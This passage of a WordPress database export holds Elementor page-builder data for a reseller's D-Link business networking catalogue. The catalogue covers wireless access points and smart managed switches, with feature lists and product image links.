]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7621,3417,'_elementor_version','2.5.14'),(7622,3417,'_elementor_edit_mode','builder'),(7625,3418,'_wp_page_template','template-fullwidth.php'),(7626,3418,'_elementor_template_type','post'),(7627,3418,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" 